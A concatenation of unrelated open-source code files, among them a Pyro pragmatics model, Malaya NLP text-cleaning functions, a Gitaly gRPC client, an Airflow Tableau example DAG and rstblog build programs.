logger.info('netaxept-query', transaction_id=transaction_id)
payment_gateway, gateway_config = get_payment_gateway('netaxept')
netaxept_config = gateway_to_netaxept_config(gateway_config)
query_response = netaxept_protocol.query(config=netaxept_config, transaction_id=transaction_id)
return TemplateResponse(request, 'netaxept/query_result.html', {'query_response': query_response})
urls = [
path('register_and_goto_terminal/<payment_id>', register_and_goto_terminal,
name='netaxept_register_and_goto_terminal'),
path('after_terminal', after_terminal, name='netaxept_after_terminal'),
path('query/<transaction_id>', query, name='netaxept_query'),
]
|
the-stack_106_23890 | from .base import GnuRecipe
class QemacsRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(QemacsRecipe, self).__init__(*args, **kwargs)
self.sha256 = '2ffba66a44783849282199acfcc08707' \
'debc7169394a8fd0902626222f27df94'
self.name = 'qemacs'
self.version = '0.3.3'
self.version_regex = r'(?P<version>\d+\.\d+\.\d+)'
self.version_url = 'https://bellard.org/qemacs/'
self.url = 'https://bellard.org/qemacs/qemacs-$version.tar.gz'
self.configure_args += ['--disable-xv']
self.compile_args = ['make', '-j1']
|
the-stack_106_23891 | # Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
"""
Interpreting hyperbole with RSA models of pragmatics.
Taken from: https://gscontras.github.io/probLang/chapters/03-nonliteral.html
"""
import torch
import collections
import argparse
import pyro
import pyro.distributions as dist
import pyro.poutine as poutine
from search_inference import HashingMarginal, memoize, Search
torch.set_default_dtype(torch.float64) # double precision for numerical stability
def Marginal(fn):
return memoize(lambda *args: HashingMarginal(Search(fn).run(*args)))
######################################
# models
######################################
# hashable state
State = collections.namedtuple("State", ["price", "valence"])
def approx(x, b=None):
if b is None:
b = 10.
div = float(x)/b
rounded = int(div) + 1 if div - float(int(div)) >= 0.5 else int(div)
return int(b) * rounded
def price_prior():
values = [50, 51, 500, 501, 1000, 1001, 5000, 5001, 10000, 10001]
probs = torch.tensor([0.4205, 0.3865, 0.0533, 0.0538, 0.0223, 0.0211, 0.0112, 0.0111, 0.0083, 0.0120])
ix = pyro.sample("price", dist.Categorical(probs=probs))
return values[ix]
def valence_prior(price):
probs = {
50: 0.3173,
51: 0.3173,
500: 0.7920,
501: 0.7920,
1000: 0.8933,
1001: 0.8933,
5000: 0.9524,
5001: 0.9524,
10000: 0.9864,
10001: 0.9864
}
return pyro.sample("valence", dist.Bernoulli(probs=probs[price])).item() == 1
def meaning(utterance, price):
return utterance == price
qud_fns = {
"price": lambda state: State(price=state.price, valence=None),
"valence": lambda state: State(price=None, valence=state.valence),
"priceValence": lambda state: State(price=state.price, valence=state.valence),
"approxPrice": lambda state: State(price=approx(state.price), valence=None),
"approxPriceValence": lambda state: State(price=approx(state.price), valence=state.valence),
}
def qud_prior():
values = ["price", "valence", "priceValence", "approxPrice", "approxPriceValence"]
ix = pyro.sample("qud", dist.Categorical(probs=torch.ones(len(values)) / len(values)))
return values[ix]
def utterance_cost(numberUtt):
preciseNumberCost = 1.
return 0. if approx(numberUtt) == numberUtt else preciseNumberCost
def utterance_prior():
utterances = [50, 51, 500, 501, 1000, 1001, 5000, 5001, 10000, 10001]
utteranceLogits = -torch.tensor(list(map(utterance_cost, utterances)),
dtype=torch.float64)
ix = pyro.sample("utterance", dist.Categorical(logits=utteranceLogits))
return utterances[ix]
@Marginal
def literal_listener(utterance, qud):
price = price_prior()
state = State(price=price, valence=valence_prior(price))
pyro.factor("literal_meaning", 0. if meaning(utterance, price) else -999999.)
return qud_fns[qud](state)
@Marginal
def speaker(qudValue, qud):
alpha = 1.
utterance = utterance_prior()
literal_marginal = literal_listener(utterance, qud)
with poutine.scale(scale=torch.tensor(alpha)):
pyro.sample("listener", literal_marginal, obs=qudValue)
return utterance
@Marginal
def pragmatic_listener(utterance):
# priors
price = price_prior()
valence = valence_prior(price)
qud = qud_prior()
# model
state = State(price=price, valence=valence)
qudValue = qud_fns[qud](state)
speaker_marginal = speaker(qudValue, qud)
pyro.sample("speaker", speaker_marginal, obs=utterance)
return state
def test_truth():
true_vals = {
"probs": torch.tensor([0.0018655171404222354,0.1512643329444101,0.0030440475496016296,0.23182161303428897,0.00003854830096338984,0.01502495595927897,0.00003889558295405101,0.015160315922876075,0.00016425635615857924,0.026788637869123822,0.00017359794987375924,0.028312162297699582,0.0008164336950199063,0.060558944822420434,0.0008088460212743665,0.05999612935009309,0.01925106279557206,0.17429720083660782,0.02094455861717477,0.18962994295418778]), # noqa: E231,E501
"support": list(map(lambda d: State(**d), [{"price":10001,"valence":False},{"price":10001,"valence":True},{"price":10000,"valence":False},{"price":10000,"valence":True},{"price":5001,"valence":False},{"price":5001,"valence":True},{"price":5000,"valence":False},{"price":5000,"valence":True},{"price":1001,"valence":False},{"price":1001,"valence":True},{"price":1000,"valence":False},{"price":1000,"valence":True},{"price":501,"valence":False},{"price":501,"valence":True},{"price":500,"valence":False},{"price":500,"valence":True},{"price":51,"valence":False},{"price":51,"valence":True},{"price":50,"valence":False},{"price":50,"valence":True}])) # noqa: E231,E501
}
pragmatic_marginal = pragmatic_listener(10000)
for i, elt in enumerate(true_vals["support"]):
print("{}: true prob {} pyro prob {}".format(
elt, true_vals["probs"][i].item(),
pragmatic_marginal.log_prob(elt).exp().item()))
def main(args):
# test_truth()
pragmatic_marginal = pragmatic_listener(args.price)
pd, pv = pragmatic_marginal._dist_and_values()
print([(s, pragmatic_marginal.log_prob(s).exp().item())
for s in pragmatic_marginal.enumerate_support()])
if __name__ == "__main__":
assert pyro.__version__.startswith('1.5.1')
parser = argparse.ArgumentParser(description="parse args")
parser.add_argument('-n', '--num-samples', default=10, type=int)
parser.add_argument('--price', default=10000, type=int)
args = parser.parse_args()
main(args)
|
the-stack_106_23892 | import re
import os
import numpy as np
import itertools
import collections
from unidecode import unidecode
from malaya.text.tatabahasa import (
stopword_tatabahasa,
stopwords,
stopwords_calon,
laughing,
)
from malaya.text.rules import normalized_chars
from malaya.text.english.words import words as _english_words
from malaya.text.bahasa.words import words as _malay_words
from malaya import home
import json
STOPWORDS = set(stopwords + stopword_tatabahasa + stopwords_calon)
STOPWORD_CALON = set(stopwords_calon)
VOWELS = 'aeiou'
PHONES = ['sh', 'ch', 'ph', 'sz', 'cz', 'sch', 'rz', 'dz']
ENGLISH_WORDS = _english_words
MALAY_WORDS = _malay_words
def _isWord(word):
if word:
consecutiveVowels = 0
consecutiveConsonents = 0
for idx, letter in enumerate(word.lower()):
vowel = True if letter in VOWELS else False
if idx:
prev = word[idx - 1]
prevVowel = True if prev in VOWELS else False
if not vowel and letter == 'y' and not prevVowel:
vowel = True
if prevVowel != vowel:
consecutiveVowels = 0
consecutiveConsonents = 0
if vowel:
consecutiveVowels += 1
else:
consecutiveConsonents += 1
if consecutiveVowels >= 3 or consecutiveConsonents > 3:
return False
if consecutiveConsonents == 3:
subStr = word[idx - 2 : idx + 1]
if any(phone in subStr for phone in PHONES):
consecutiveConsonents -= 1
continue
return False
return True
def make_cleaning(s, c_dict):
s = s.translate(c_dict)
return s
def transformer_textcleaning(string):
"""
use by any transformer model before tokenization
"""
string = unidecode(string)
string = ' '.join(
[make_cleaning(w, normalized_chars) for w in string.split()]
)
string = re.sub('\(dot\)', '.', string)
string = (
re.sub(re.findall(r'\<a(.*?)\>', string)[0], '', string)
if (len(re.findall(r'\<a (.*?)\>', string)) > 0)
and ('href' in re.findall(r'\<a (.*?)\>', string)[0])
else string
)
string = re.sub(
r'\w+:\/{2}[\d\w-]+(\.[\d\w-]+)*(?:(?:\/[^\s/]*))*', ' ', string
)
string = re.sub(r'[ ]+', ' ', string).strip().split()
string = [w for w in string if w[0] != '@']
string = [w.title() if w[0].isupper() else w for w in string]
return ' '.join(string)
def malaya_textcleaning(string):
"""
use by normalizer, spell
remove links, hashtags, alias
only accept A-Z, a-z
remove any laugh
remove any repeated char more than 2 times
remove most of nonsense words
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[
word
for word in string.split()
if word.find('#') < 0 and word.find('@') < 0
]
),
)
string = unidecode(string).replace('.', '. ').replace(',', ' , ')
string = re.sub('[^\'"A-Za-z\- ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string.lower()).strip()
string = [word for word in string.lower().split() if _isWord(word)]
string = [
word
for word in string
if not any([laugh in word for laugh in laughing])
and word[: len(word) // 2] != word[len(word) // 2 :]
]
string = ' '.join(string)
string = (
''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
).split()
return ' '.join([word for word in string if word not in STOPWORDS])
def normalizer_textcleaning(string):
"""
use by normalizer, spell
remove links, hashtags, alias
only accept A-Z, a-z
remove any laugh
remove any repeated char more than 2 times
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[
word
for word in string.split()
if word.find('#') < 0 and word.find('@') < 0
]
),
)
string = re.sub('[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
string = [
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
string = [
word
for word in string
if not any([laugh in word for laugh in laughing])
]
string = ' '.join(string)
return ''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
def simple_textcleaning(string, lowering = True):
"""
use by topic modelling
only accept A-Z, a-z
"""
string = unidecode(string)
string = re.sub('[^A-Za-z ]+', ' ', string)
return re.sub(r'[ ]+', ' ', string.lower() if lowering else string).strip()
def entities_textcleaning(string, lowering = True):
"""
use by entities recognition, pos recognition and dependency parsing
"""
string = re.sub('[^A-Za-z0-9\-() ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
original_string = string.split()
if lowering:
string = string.lower()
string = [
(original_string[no], word.title() if word.isupper() else word)
for no, word in enumerate(string.split())
if len(word)
]
return [s[0] for s in string], [s[1] for s in string]
def summary_textcleaning(string):
original_string = string
string = re.sub('[^A-Za-z0-9\-\/\'"\.\, ]+', ' ', unidecode(string))
return original_string, re.sub(r'[ ]+', ' ', string.lower()).strip()
def get_hashtags(string):
return [hash.lower() for hash in re.findall('#(\w+)', string)]
def split_by_dot(string):
string = re.sub(
r'(?<!\d)\.(?!\d)',
'SPLITTT',
string.replace('\n', '').replace('/', ' '),
)
string = string.split('SPLITTT')
return [re.sub(r'[ ]+', ' ', sentence).strip() for sentence in string]
def language_detection_textcleaning(string):
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
chars = ',.()!:\'"/;=-'
for c in chars:
string = string.replace(c, f' {c} ')
string = string.replace('\n', '').replace('\t', '')
string = re.sub(
'[0-9!@#$%^&*()_\-+{}|\~`\'";:?/.>,<]', ' ', string, flags = re.UNICODE
)
string = re.sub(r'[ ]+', ' ', string).strip()
return string.lower()
def pos_entities_textcleaning(string):
"""
use by text entities and pos
remove links, hashtags, alias
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub('[^A-Za-z\- ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
return ' '.join(
[
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
)
def classification_textcleaning(string, no_stopwords = False, lowering = True):
"""
stemmer, summarization, topic-modelling
remove links, hashtags, alias
"""
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub('[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
if no_stopwords:
string = ' '.join(
[
i
for i in re.findall('[\\w\']+|[;:\-\(\)&.,!?"]', string)
if len(i)
]
)
else:
string = ' '.join(
[
i
for i in re.findall('[\\w\']+|[;:\-\(\)&.,!?"]', string)
if len(i) and i not in STOPWORDS
]
)
if lowering:
return string.lower()
else:
return ' '.join(
[
word.title() if word.isupper() else word
for word in string.split()
if len(word)
]
)
def separate_dataset(trainset):
datastring = []
datatarget = []
for i in range(len(trainset.data)):
data_ = trainset.data[i].split('\n')
data_ = list(filter(None, data_))
datastring += data_
for n in range(len(data_)):
datatarget.append(trainset.target[i])
return datastring, datatarget
def print_topics_modelling(
topics, feature_names, sorting, n_words = 20, return_df = True
):
if return_df:
try:
import pandas as pd
except:
raise Exception(
'pandas not installed. Please install it and try again or set `return_df = False`'
)
df = {}
for i in range(topics):
words = []
for k in range(n_words):
words.append(feature_names[sorting[i, k]])
df['topic %d' % (i)] = words
if return_df:
return pd.DataFrame.from_dict(df)
else:
return df
def str_idx(corpus, dic, maxlen, UNK = 0):
X = np.zeros((len(corpus), maxlen))
for i in range(len(corpus)):
for no, k in enumerate(corpus[i].split()[:maxlen][::-1]):
X[i, -1 - no] = dic.get(k, UNK)
return X
def stemmer_str_idx(corpus, dic, UNK = 3):
X = []
for i in corpus:
ints = []
for k in i:
ints.append(dic.get(k, UNK))
X.append(ints)
return X
def pad_sentence_batch(sentence_batch, pad_int):
padded_seqs = []
seq_lens = []
max_sentence_len = max([len(sentence) for sentence in sentence_batch])
for sentence in sentence_batch:
padded_seqs.append(
sentence + [pad_int] * (max_sentence_len - len(sentence))
)
seq_lens.append(len(sentence))
return padded_seqs, seq_lens
def char_str_idx(corpus, dic, UNK = 2):
maxlen = max([len(i) for i in corpus])
X = np.zeros((len(corpus), maxlen))
for i in range(len(corpus)):
for no, k in enumerate(corpus[i][:maxlen]):
X[i, no] = dic.get(k, UNK)
return X
def generate_char_seq(batch, dic, UNK = 2):
maxlen_c = max([len(k) for k in batch])
x = [[len(i) for i in k] for k in batch]
maxlen = max([j for i in x for j in i])
temp = np.zeros((len(batch), maxlen_c, maxlen), dtype = np.int32)
for i in range(len(batch)):
for k in range(len(batch[i])):
for no, c in enumerate(batch[i][k][::-1]):
temp[i, k, -1 - no] = dic.get(c, UNK)
return temp
def build_dataset(words, n_words, included_prefix = True):
count = (
[['GO', 0], ['PAD', 1], ['EOS', 2], ['UNK', 3]]
if included_prefix
else []
)
count.extend(collections.Counter(words).most_common(n_words))
dictionary = dict()
for word, _ in count:
dictionary[word] = len(dictionary)
data = list()
for word in words:
index = dictionary.get(word, 3)
data.append(index)
reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return data, count, dictionary, reversed_dictionary
def multireplace(string, replacements):
substrs = sorted(replacements, key = len, reverse = True)
regexp = re.compile('|'.join(map(re.escape, substrs)))
return regexp.sub(lambda match: replacements[match.group(0)], string)
def case_of(text):
return (
str.upper
if text.isupper()
else str.lower
if text.islower()
else str.title
if text.istitle()
else str
)
alphabets = '([A-Za-z])'
prefixes = (
'(Mr|St|Mrs|Ms|Dr|Prof|Capt|Cpt|Lt|Mt|Puan|puan|Tuan|tuan|sir|Sir)[.]'
)
suffixes = '(Inc|Ltd|Jr|Sr|Co)'
starters = '(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever|Dia|Mereka|Tetapi|Kita|Itu|Ini|Dan|Kami)'
acronyms = '([A-Z][.][A-Z][.](?:[A-Z][.])?)'
websites = '[.](com|net|org|io|gov|me|edu|my)'
another_websites = '(www|http|https)[.]'
digits = '([0-9])'
def split_into_sentences(text):
text = unidecode(text)
text = ' ' + text + ' '
text = text.replace('\n', ' ')
text = re.sub(prefixes, '\\1<prd>', text)
text = re.sub(websites, '<prd>\\1', text)
text = re.sub(another_websites, '\\1<prd>', text)
if '...' in text:
text = text.replace('...', '<prd><prd><prd>')
if 'Ph.D' in text:
text = text.replace('Ph.D.', 'Ph<prd>D<prd>')
text = re.sub('\s' + alphabets + '[.] ', ' \\1<prd> ', text)
text = re.sub(acronyms + ' ' + starters, '\\1<stop> \\2', text)
text = re.sub(
alphabets + '[.]' + alphabets + '[.]' + alphabets + '[.]',
'\\1<prd>\\2<prd>\\3<prd>',
text,
)
text = re.sub(
alphabets + '[.]' + alphabets + '[.]', '\\1<prd>\\2<prd>', text
)
text = re.sub(' ' + suffixes + '[.] ' + starters, ' \\1<stop> \\2', text)
text = re.sub(' ' + suffixes + '[.]', ' \\1<prd>', text)
text = re.sub(' ' + alphabets + '[.]', ' \\1<prd>', text)
text = re.sub(digits + '[.]' + digits, '\\1<prd>\\2', text)
if '”' in text:
text = text.replace('.”', '”.')
if '"' in text:
text = text.replace('."', '".')
if '!' in text:
text = text.replace('!"', '"!')
if '?' in text:
text = text.replace('?"', '"?')
text = text.replace('.', '.<stop>')
text = text.replace('?', '?<stop>')
text = text.replace('!', '!<stop>')
text = text.replace('<prd>', '.')
sentences = text.split('<stop>')
sentences = sentences[:-1]
sentences = [s.strip() for s in sentences if len(s) > 10]
return sentences
def end_of_chunk(prev_tag, tag):
if not len(prev_tag):
return False
if prev_tag != tag:
return True
def start_of_chunk(prev_tag, tag):
if not len(prev_tag):
return True
if prev_tag != tag:
return False
def tag_chunk(seq):
words = [i[0] for i in seq]
seq = [i[1] for i in seq]
prev_tag = ''
begin_offset = 0
chunks = []
for i, chunk in enumerate(seq):
if end_of_chunk(prev_tag, chunk):
chunks.append((prev_tag, begin_offset, i - 1))
prev_tag = ''
if start_of_chunk(prev_tag, chunk):
begin_offset = i
prev_tag = chunk
res = {'words': words, 'tags': []}
for chunk_type, chunk_start, chunk_end in chunks:
tag = {
'text': ' '.join(words[chunk_start : chunk_end + 1]),
'type': chunk_type,
'score': 1.0,
'beginOffset': chunk_start,
'endOffset': chunk_end,
}
res['tags'].append(tag)
return res
|
the-stack_106_23893 | import grpc
from .proto import (
ref_pb2, ref_pb2_grpc,
commit_pb2, commit_pb2_grpc,
blob_pb2_grpc,
)
from .proto import shared_pb2
from ..errors import GitlabArtifactsError
GITALY_ADDR = 'unix:/var/opt/gitlab/gitaly/gitaly.socket'
REF_PREFIX = 'refs/heads/'
def _gitaly_repo(project):
return shared_pb2.Repository(
storage_name=project.storage,
relative_path=project.disk_path,
gl_repository=project.gl_repository,
)
class GitalyClient():
def __init__(self, addr=GITALY_ADDR):
self.addr = addr
self._channel = None
self._refsvc = None
self._commitsvc = None
self._blobsvc = None
def __enter__(self):
self._channel = grpc.insecure_channel(self.addr)
self._refsvc = ref_pb2_grpc.RefServiceStub(self._channel)
self._commitsvc = commit_pb2_grpc.CommitServiceStub(self._channel)
self._blobsvc = blob_pb2_grpc.BlobServiceStub(self._channel)
return self
def __exit__(self, *args):
self._channel.close()
@staticmethod
def name_from_ref(ref):
if ref.lower().startswith(REF_PREFIX):
return ref[len(REF_PREFIX):]
return ref
def get_branches(self, project):
repository = _gitaly_repo(project)
request = ref_pb2.FindAllBranchesRequest(
repository=repository
)
branches = []
try:
# Gitaly "chunks?" responses at 20 items
# https://tinyurl.com/ycuazk7w
for page in self._refsvc.FindAllBranches(request):
for branch in page.branches:
ref = (
GitalyClient.name_from_ref(branch.name.decode('utf-8')),
branch.target.id,
)
branches.append(ref)
except grpc.RpcError as e:
raise GitlabArtifactsError(
'RefSvc.FindAllBranches for {} failed with error {}:{}'.format(
project.full_path,
e.code(),
e.details()
)
)
# Safety check for failed requests
if not branches:
raise GitlabArtifactsError(
'Gitaly returned no branches for {}'.format(
project.full_path
)
)
return branches
def get_tree_entry(self, ref, path):
repository = _gitaly_repo(ref.project)
request = commit_pb2.TreeEntryRequest(
repository=repository,
revision=ref.commit.encode('utf-8'),
path=path.encode('utf-8'),
limit=0,
)
try:
# This should raise RpcError - on notfound, but it doesn't?
response = list(self._commitsvc.TreeEntry(request))
except grpc.RpcError as e:
raise GitlabArtifactsError(
'CommitSvc.TreeEntry failed with error {}:{}'.format(
e.code(),
e.details()
)
)
# We should always get a response - it may be empty
if not response:
raise GitlabArtifactsError(
'CommitSvc.TreeEntry did not return a response')
first_entry = response[0]
# Ensure the first entry is type=BLOB, failed requests return type=COMMIT
if first_entry.type != 1:
return (None,)*3
return (
first_entry.oid,
first_entry.size,
b''.join(entry.data for entry in response)
)
|
the-stack_106_23894 | #!/usr/bin/env python
# coding: utf-8
import os
import numpy as np
import argparse
from math import floor
def main(args):
# class foo(object):
# pass
# args = foo()
# args.ref='raw/training2017/REFERENCE.csv'
annot_lines = open(args.ref, 'r').read().splitlines()
np.random.shuffle(annot_lines)
annot_dict = {s: s.split(',')[1] for s in annot_lines}
index_dict = {'N': [], 'A': [], 'O': [], '~': []}
for idx, line in enumerate(annot_lines):
index_dict[annot_dict[line]].append(idx)
TRAIN = args.train / 100.
VAL = args.val / 100.
print('Sample in class/set:')
print('\tTotal,\tTrain,\tValid,\tTest')
for x in index_dict.items():
l = len(x[1])
hist = (x[0], l, floor(l * TRAIN), floor(l * VAL),
l - floor((TRAIN + VAL) * l))
print('%s,\t%d,\t%d,\t%d\t%d' % hist)
def fp(x): return os.path.normpath(os.path.dirname(args.ref) + '/' + x)
train_reference = open(fp('TRAIN.csv'), 'w')
validation_reference = open(fp('VALIDATION.csv'), 'w')
test_reference = open(fp('TEST.csv'), 'w')
for idxs in index_dict.values():
l = len(idxs)
train_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[:floor(l * TRAIN)])
validation_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[floor(l * TRAIN):floor(l * (TRAIN + VAL))])
test_reference.writelines(
'%s\n' % annot_lines[i] for i in idxs[floor(l * (TRAIN + VAL)):])
print('References written succesfully to:')
print(train_reference.name,
validation_reference.name,
test_reference.name,
sep='\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--ref', help='location of reference file',
default='./raw/training2017/REFERENCE.csv')
parser.add_argument(
'--train', help='percents of files from `--ref` to keep in train set',
type=int, default=80)
parser.add_argument(
'--val', help='percents of files from `--ref` to keep in val set',
type=int, default=10)
args = parser.parse_args()
main(args)
|
the-stack_106_23896 | import math
import torch.nn as nn
import torch.nn.functional as F
from GDN import Gdn
class EONSS(nn.Module):
def __init__(self):
super(EONSS, self).__init__()
self.conv1 = nn.Conv2d(3, 8, 5, stride=2, padding=2)
self.gdn1 = Gdn(8)
self.conv2 = nn.Conv2d(8, 16, 5, stride=2, padding=2)
self.gdn2 = Gdn(16)
self.conv3 = nn.Conv2d(16, 32, 5, stride=2, padding=2)
self.gdn3 = Gdn(32)
self.conv4 = nn.Conv2d(32, 64, 3, stride=1, padding=0)
self.gdn4 = Gdn(64)
self.st2_fc1 = nn.Conv2d(64, 256, 1, stride=1, padding=0)
self.st2_gdn1 = Gdn(256)
self.st2_fc2 = nn.Conv2d(256, 1, 1, stride=1, padding=0)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, Gdn):
m.gamma.data.fill_(1)
m.beta.data.fill_(1e-2)
def forward(self, x):
batch_size = x.size()[0]
x = F.max_pool2d(self.gdn1(self.conv1(x)), (2, 2))
x = F.max_pool2d(self.gdn2(self.conv2(x)), (2, 2))
x = F.max_pool2d(self.gdn3(self.conv3(x)), (2, 2))
x = F.max_pool2d(self.gdn4(self.conv4(x)), (2, 2))
y2 = self.st2_gdn1(self.st2_fc1(x))
s = self.st2_fc2(y2)
s = s.view(batch_size, -1)
return s
|
the-stack_106_23897 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is an example dag that performs two refresh operations on a Tableau Workbook aka Extract. The first one
waits until it succeeds. The second does not wait since this is an asynchronous operation and we don't know
when the operation actually finishes. That's why we have another task that checks only that.
"""
from datetime import timedelta
from airflow import DAG
from airflow.providers.tableau.operators.tableau import TableauOperator
from airflow.providers.tableau.sensors.tableau_job_status import TableauJobStatusSensor
from airflow.utils.dates import days_ago
DEFAULT_ARGS = {
'owner': 'airflow',
'depends_on_past': False,
'email': ['[email protected]'],
'email_on_failure': False,
'email_on_retry': False,
}
with DAG(
dag_id='example_tableau',
default_args=DEFAULT_ARGS,
dagrun_timeout=timedelta(hours=2),
schedule_interval=None,
start_date=days_ago(2),
tags=['example'],
) as dag:
# Refreshes a workbook and waits until it succeeds.
# [START howto_operator_tableau]
task_refresh_workbook_blocking = TableauOperator(
resource='workbooks',
method='refresh',
find='MyWorkbook',
match_with='name',
site_id='my_site',
blocking_refresh=True,
task_id='refresh_tableau_workbook_blocking',
)
# [END howto_operator_tableau]
# Refreshes a workbook and does not wait until it succeeds.
task_refresh_workbook_non_blocking = TableauOperator(
resource='workbooks',
method='refresh',
find='MyWorkbook',
match_with='name',
site_id='my_site',
blocking_refresh=False,
task_id='refresh_tableau_workbook_non_blocking',
)
# The following task queries the status of the workbook refresh job until it succeeds.
task_check_job_status = TableauJobStatusSensor(
site_id='my_site',
job_id="{{ ti.xcom_pull(task_ids='refresh_tableau_workbook_non_blocking') }}",
task_id='check_tableau_job_status',
)
task_refresh_workbook_non_blocking >> task_check_job_status
|
the-stack_106_23898 | #!/usr/bin/env python
"""
Created by howie.hu at 2021-04-08.
Description:从广告文本提取抽取标题作为训练样本
Changelog: all notable changes to this file will be documented
"""
import os
import time
import pandas as pd
from newspaper import Article
from src.config import Config
def csv2txt(target_path: str = ""):
"""
提取广告CSV中的标题作为广告样本
:param target_path:
:return:
"""
target_path = target_path or os.path.join(
Config.MODEL_DIR, f"cos/train.{int(time.time())}.txt"
)
ads_path = "../.files/datasets/ads.csv"
df = pd.read_csv(ads_path)
all_title = df["title"].drop_duplicates().values.tolist()
with open(target_path, "w") as fp:
for title in all_title:
fp.write(title + "\n")
print(f"{target_path} 写入成功,共 {len(all_title)} 条记录")
if __name__ == "__main__":
csv2txt()
# article = Article(
# "https://mp.weixin.qq.com/s/D-las20I8POTmWNaXradhw", language="zh"
# )
# article.download()
# article.parse()
# print(article.text)
# article.nlp()
# print(article.keywords)
# print(article.summary)
|
the-stack_106_23899 | # -*- coding: utf-8 -*-
"""
rstblog.programs
~~~~~~~~~~~~~~~~
Builtin build programs.
:copyright: (c) 2010 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import os
import yaml
import shutil
from datetime import datetime
from StringIO import StringIO
from weakref import ref
class Program(object):
def __init__(self, context):
self._context = ref(context)
@property
def context(self):
rv = self._context()
if rv is None:
raise RuntimeError('context went away, program is invalid')
return rv
def get_desired_filename(self):
folder, basename = os.path.split(self.context.source_filename)
simple_name = os.path.splitext(basename)[0]
if simple_name == 'index':
suffix = 'index.html'
else:
suffix = os.path.join(simple_name, 'index.html')
return os.path.join(folder, suffix)
def prepare(self):
pass
def render_contents(self):
return u''
def run(self):
raise NotImplementedError()
class CopyProgram(Program):
"""A program that copies a file over unchanged"""
def run(self):
self.context.make_destination_folder()
shutil.copy(self.context.full_source_filename,
self.context.full_destination_filename)
def get_desired_filename(self):
return self.context.source_filename
class TemplatedProgram(Program):
default_template = None
def get_template_context(self):
return {}
def run(self):
template_name = self.context.config.get('template') \
or self.default_template
context = self.get_template_context()
rv = self.context.render_template(template_name, context)
with self.context.open_destination_file() as f:
f.write(rv.encode('utf-8') + '\n')
class RSTProgram(TemplatedProgram):
"""A program that renders an rst file into a template"""
default_template = 'rst_display.html'
_fragment_cache = None
def prepare(self):
headers = ['---']
with self.context.open_source_file() as f:
for line in f:
line = line.rstrip()
if not line:
break
headers.append(line)
title = self.parse_text_title(f)
cfg = yaml.load(StringIO('\n'.join(headers)), Loader=yaml.FullLoader)
if cfg:
if not isinstance(cfg, dict):
raise ValueError('expected dict config in file "%s", got: %.40r' \
% (self.context.source_filename, cfg))
self.context.config = self.context.config.add_from_dict(cfg)
self.context.destination_filename = cfg.get(
'destination_filename',
self.context.destination_filename)
title_override = cfg.get('title')
if title_override is not None:
title = title_override
pub_date_override = cfg.get('pub_date')
if pub_date_override is not None:
if not isinstance(pub_date_override, datetime):
pub_date_override = datetime(pub_date_override.year,
pub_date_override.month,
pub_date_override.day)
self.context.pub_date = pub_date_override
summary_override = cfg.get('summary')
if summary_override is not None:
self.context.summary = summary_override
if title is not None:
self.context.title = title
def parse_text_title(self, f):
buffer = []
for line in f:
line = line.rstrip()
if not line:
break
buffer.append(line)
return self.context.render_rst('\n'.join(buffer).decode('utf-8')).get('title')
def get_fragments(self):
if self._fragment_cache is not None:
return self._fragment_cache
with self.context.open_source_file() as f:
while f.readline().strip():
pass
rv = self.context.render_rst(f.read().decode('utf-8'))
self._fragment_cache = rv
return rv
def render_contents(self):
return self.get_fragments()['fragment']
def get_template_context(self):
ctx = TemplatedProgram.get_template_context(self)
ctx['rst'] = self.get_fragments()
return ctx
|
the-stack_106_23901 | #!/usr/bin/env python3
import argparse
import pandas as pd
import numpy as np
import sys
import matplotlib
from matplotlib import use
use('Agg')
import matplotlib.pyplot as plt
EOL=chr(10)
def parseArguments():
if len(sys.argv)<=1:
sys.argv="mafplot.py $input $output".split()
parser=argparse.ArgumentParser()
parser.add_argument("--phenos", type=str, metavar='phenotypes', required=True)
parser.add_argument("--skip-zero", dest="skip_zero", action="store_true", default=False)
parser.add_argument('input', type=str, metavar='input'),
parser.add_argument('output', type=str, metavar='output'),
args = parser.parse_args()
return args
transforms = [[1,np.log1p],[np.sqrt,np.cbrt]]
transform_names = [["no transform","log transform"],["square root transform","cube root transform"]]
def numfrm(x):
xstr=str(x)
if "." not in xstr: return xstr
if x<0.1:
xstr="%6.4E"%x
